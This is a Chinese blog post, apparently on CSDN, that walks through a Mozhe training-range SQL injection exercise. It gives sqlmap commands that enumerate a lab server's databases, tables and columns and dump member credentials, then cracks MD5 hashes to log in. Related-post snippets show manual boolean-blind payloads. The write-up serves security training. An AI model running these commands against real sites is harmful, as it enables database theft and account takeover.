【墨者】SQL注入漏洞测试(布尔盲注)

最新推荐文章于 2023-01-24 20:24:01 发布
最新推荐文章于 2023-01-24 20:24:01 发布
阅读量962 收藏
点赞数 1
文章标签: web安全 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48621644/article/details/126866770
版权

来咯来咯~

一起看一下系统界面吧,哎嘿,有登录框,操作一波发现,没注入😓

点击平台维护通知,发现url中有id=1,很明显,指定有注入啊😁

上工具,先爆破数据库

sqlmap -u http://124.70.71.251:40299/new_list.php?id=1 --dbs –batch

发现stormgroup数据库名

爆破表

sqlmap -u http://124.70.71.251:40299/new_list.php?id=1 -D stormgroup --tables --batch

哇呜~   有member

接着干就完了,爆破列名

sqlmap -u http://124.70.71.251:40299/new_list.php?id=1 -D stormgroup -T member --columns –batch

这不就出来了嘛

拖库,查看账号密码

sqlmap -u http://124.70.71.251:40299/new_list.php?id=1 -D stormgroup -T member -C 'name,password' --dump –batch

密码使用MD5加密

使用在线解密工具

登录后显示用户被禁用或者不存在

解密另一个试试

登录成功,成功得到key

加油加油!!!

小羊学安全
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
墨者学院-SQL注入漏洞测试布尔盲注
weixin_42939822的博客
03-20 4287
决心按部就班、由浅入深地去剖析下sql注入题目提供的靶场环境,完善自身解题思路。本题靶场环境比较简单、也比较常见,没有设置严格的过滤规则,仅仅是限制了页面的回显功能,属于比较初级的sql注入题目。废话不多说啦,先附上题目链接:https://www.mozhe.cn/bug/detail/UDNpU0gwcUhXTUFvQm9HRVdOTmNTdz09bW96aGUmozhe*
0x00.SQL注入漏洞测试(布尔盲注)
qq_31679787的博客
09-09 182
初始界面; 尝试进行post注入,但是发现不行; 但是发现下方的通知栏会跳转,跳转后的页面存在注入; 爆库名; 爆表名; 先爆member表的列名; 爆库; 通过md5解密得到密码; 登录后得到key; ...
墨者学院-SQL注入漏洞测试(布尔盲注)
Fisher
12-01 3854
拿到题目之后打开网站发现如下界面 本以为是输入框存在注入,结果发现并不是,而是下面一段小字,发现存在id=1的字样 手工注入: 1.判断注入点:
墨者 - SQL注入漏洞测试(布尔盲注)
吃肉唐僧的博客
07-01 5095
手工注入 根据浮动的通告进度条,找到sql注入点 输入/new_list.php?id=1' and 1=1,内容空白 输入/new_list.php?id=1 and 1=1,内容显示,判断这个id的值类型是数字类型 然后开始判断数据库名字的长度,/new_list.php?id=1 and length(database())=1,内容空白。一直试,试到长度为10 ...
WebShell文件上传漏洞分析溯源
02-22
2. 渗透测试:通过渗透测试来检测Web应用程序是否存在文件上传漏洞。 3. 漏洞扫描:使用漏洞扫描工具来检测Web应用程序是否存在文件上传漏洞。 六、WebShell 文件上传漏洞的实践案例 在这个实践案例中,我们使用...
spring IOC实现(墨者革离)
12-12
该代码主要用于spring IOC的实现(墨者革离),模拟一个城门叩问的编剧场景
墨者未必黑.pdf
12-26
墨者未必黑.pdf
墨者安全专家 3.7(更新)
11-03
3、墨者漏洞修补 通过全面扫描windows和软件中存在的系统漏洞,一键完成补丁的下载与安装,及时排除系统的安全隐患。 4、墨者保护隐私 及时清理上网历史记录、网银注册信息、系统临时文件及cookies等,全面保护个人...
墨者安全专家 v3.7.2.9
03-12
3、墨者漏洞修补 通过全面扫描windows和软件中存在的系统漏洞,一键完成补丁的下载与安装,及时排除系统的安全隐患。 4、墨者保护隐私 及时清理上网历史记录、网银注册信息、系统临时文件及cookies等,全面保护个人...
墨者学院-----SQL注入漏洞测试(布尔盲注)
qq_43590351的博客
05-21 539
SQL注入漏洞测试(布尔盲注) 第一步判断注入点: 在url中输入单引号发现报错,再输入and1=1页面正常,and1=2报错 说明此url存在着SQL注入漏洞 http://219.153.49.228:48551/new_list.php?id=1 and 1=2 第二步判断字段数 利用order by 语句,值为4页面正常,5报错,说明有四个字段 http://219.153.49.228:48551/new_list.php?id=1 order by 4 第三步:猜解数据库的长度以及数据库名称
刷题笔记:SQL注入漏洞测试(布尔盲注)
m0_67399862的博客
05-18 147
由and语句可看到两句都为真时页面正常,一真一假时,页面报错 用order by语句查字段数 发现4的时候,页面正常,当5的时候,页面报错 所以字段数为4 用union select语句进行联合查询时,发现1,2,3,4语句并没有拼接上去 在1前面加了个-号,仍然没有信息回显,又想到前面SQL语句执行成功和错误会返回两个不同的页面,所以考虑布尔盲注。 用and length(database())>=num语句来判断数据库长度,发现数据库的长度为10 ...
墨者靶场 入门:SQL注入漏洞测试布尔盲注
qq_43233085的博客
01-09 641
入门:SQL注入漏洞测试布尔盲注) 启动靶场环境,得到测试地址 http://219.153.49.228:44500/ 访问页面,寻找sql注入点,访问注入页面。 http://219.153.49.228:44500/new_list.php?id=1 使用sql注入工具,如sqlmap或穿山甲,进行布尔盲注。 本次使用穿山甲进行注入。 对密码密文进行MD5解码,得到密码明文,解...
墨者学院03 SQL注入漏洞测试(布尔盲注)
weixin_42789937的博客
01-24 391
墨者学院03 SQL注入漏洞测试(布尔盲注),脚本小子的SQL注入实战~
(手工)【sqli-labs15-16】POST注入:布尔/时间盲注
07-07 981
【SQL-POST】布尔/时间盲注
SQL注入漏洞测试(布尔盲注)
asd158923328的博客
08-08 1154
停机维护通知发现注入点 sqlmap -u http://219.153.49.228:46612/new_list.php?id=1 --current-db 获取到的数据库名是stormgroup sqlmap -u http://219.153.49.228:46612/new_list.php?id=1 -D stormgroup --tables 获取到的表是member和noti...
墨者靶场sql布尔盲注
最新发布
10-09
针对墨者靶场的 SQL 布尔盲注,你需要先了解 SQL 注入的基本概念和实现方式。在进行布尔盲注时,需要通过构造特定的 SQL 语句来判断数据库中是否存在某些数据或条件,从而实现注入攻击。以下是一些可能用到的注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值